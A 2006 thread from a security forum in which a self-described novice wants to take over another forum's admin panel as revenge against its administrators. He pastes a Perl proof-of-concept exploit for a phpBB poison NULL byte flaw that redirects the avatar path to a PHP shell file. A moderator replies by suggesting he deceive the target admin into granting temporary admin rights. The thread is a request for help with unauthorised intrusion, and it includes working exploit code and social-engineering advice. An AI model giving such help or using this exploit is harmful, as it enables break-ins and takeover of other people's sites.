 |
Menu |
 |
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
 |
User Info |
 |
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 101
Members: 0
Total: 101
|
|
|
|
|
 |
Full disclosure |
 |
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
This forum has really pushed my buttons! Payback time |
 |
Posted: Sat Dec 02, 2006 11:06 am |
|
|
lordtopcat |
Regular user |

 |
|
Joined: Dec 02, 2006 |
Posts: 8 |
|
|
|
 |
 |
 |
|
Hi,
I am new to hacking (not hacked a single thing yet)
However -
This one forum has really pushed my buttons and all the forum admins are all asses. And It's time one of the users took action. Well, demoting them ofcourse! Muhahaha
However, I need to know how to gain access to the Admin panel. I have activestate installed.
As far as I know, the forum is running on phpbb 2.0.20. From reading the docs/CHANGELOG.html.
If anyone could help me, I would really appreciate it!
It's time these Admin's get what's coming to them.
Thanks, |
|
|
|
|
Posted: Sat Dec 02, 2006 1:41 pm |
|
|
Sm0ke |
Moderator |

 |
|
Joined: Nov 25, 2006 |
Posts: 141 |
Location: Finland |
|
|
 |
 |
 |
|
|
|
|
|
 |
 |
|
 |
Posted: Sat Dec 02, 2006 7:22 pm |
|
|
lordtopcat |
Regular user |

 |
|
Joined: Dec 02, 2006 |
Posts: 8 |
|
|
|
 |
 |
 |
|
How can I get an sid?
And I found this code for 2.0.21. Will it work with 2.0.20?
Code: |
#!/usr/bin/perl -w
# Author: ShAnKaR
# Title: multiple PHP application poison NULL byte vulnerability
# Applications: phpBB 2.0.21, punBB 1.2.12
# Threat Level: Critical
# Original advisory (in Russian):
http://www.security.nnov.ru/Odocument221.html
#
# Poison NULL byte vulnerability for perl CGI applications was
described
# in [1]. ShAnKaR noted, that same vulnerability also affects
different
# PHP applications. An example of vulnerable applications are phpBB
and
# punBB.
#
# Vulnerability can be used to upload or replace arbitrary files
on
# server, e.g. PHP scripts, by adding "poison NULL" (%00) to
filename.
#
# In case of phpBB and punBB vulnerability can be exploited by
changing
# location of avatar file and uploading avatar file with PHP code in
EXIF
# data.
#
# A PoC exploit to change Avatar file location for phpBB:
#
#
use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass
images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible;
Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);
$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}
|
I am also a bit confused as to what I change to configure it to the right forum. |
|
|
|
|
 |
 |
|
 |
Posted: Sat Dec 02, 2006 8:23 pm |
|
|
Chb |
Valuable expert |

 |
|
Joined: Jul 23, 2005 |
Posts: 206 |
Location: Germany |
|
|
 |
 |
 |
|
I overflew the code and you seem to need a valid administrator account to use it, as you can read in the usage.
Beside that, imho in most cases exploits for newer versions also work in older versions. Depending of the changed sourcecode of updates. |
|
|
|
|
Posted: Sun Dec 03, 2006 7:56 am |
|
|
Sm0ke |
Moderator |

 |
|
Joined: Nov 25, 2006 |
Posts: 141 |
Location: Finland |
|
|
 |
 |
 |
|
try to contact admin make some good storie to tell him so he would give you temporary admin  |
|
|
|
|
Posted: Sun Dec 03, 2006 7:09 pm |
|
|
lordtopcat |
Regular user |

 |
|
Joined: Dec 02, 2006 |
Posts: 8 |
|
|
|
 |
 |
 |
|
player123 wrote: | try to contact admin make some good storie to tell him so he would give you temporary admin  |
lmao....all the admins there hate me! lol
Are there any other scripts out there? |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|